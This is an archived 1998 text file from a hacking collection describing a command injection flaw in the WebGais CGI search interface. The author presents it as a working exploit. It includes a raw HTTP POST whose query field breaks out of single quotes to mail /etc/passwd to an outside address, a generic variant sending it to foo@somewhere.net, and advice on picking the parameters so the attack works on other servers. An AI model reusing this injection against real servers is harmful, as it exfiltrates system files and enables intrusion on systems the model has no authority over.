home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Freaks Macintosh Archive
/
Freaks Macintosh Archive.bin
/
Freaks Macintosh Archives
/
Hacking & Misc
/
bundle of exploits.sit
/
bundle of exploits
/
webgais.txt
< prev
next >
Wrap
Text File
|
1998-07-17
|
2KB
|
38 lines
WebGais is an interface to the GAIS search tool. It installs a few
programs in /cgi-bin. The main utility is called "webgais" and does the
actual interfacing with the search tool.
It reads the query from a user form, and then runs the GAIS search engine
for that query. The author tried to protect the program by
using single quotes around the query when he passed it to a "system"
command. But he forgot one VERY important thing: to strip single quotes
from the query (this was done in Glimpse).
So, if we send a query like:
query=';mail+foo@somewhere.net</etc/passwd;echo'&.....
we will trick the "protection" system.
The only problem here is that you have to provide a certain combination of
input parameters, to reach the vulnerable line in the script. It took me
about half an hour to get those parameters right.
I also had to comment some code from the script to bypass some error
messages, because I do not have the GAIS search tool installed, I only
have the WEBGais interface. Of course, you won't have to modify the script
at all. It should work just fine as it is.
So here's how I exploited this:
telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)
query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph
... and it worked. But to make it work for your system too, you'll have to
add other parameters, like idx_dir and data_type who are required by the
script in its original version. Just make a normal query to your WebGais
server and see what all the parameters are. But remember to use "output" and
"domain" as specified in my exploit. Otherwise you will end up in some
other place of the script and nothing will happen.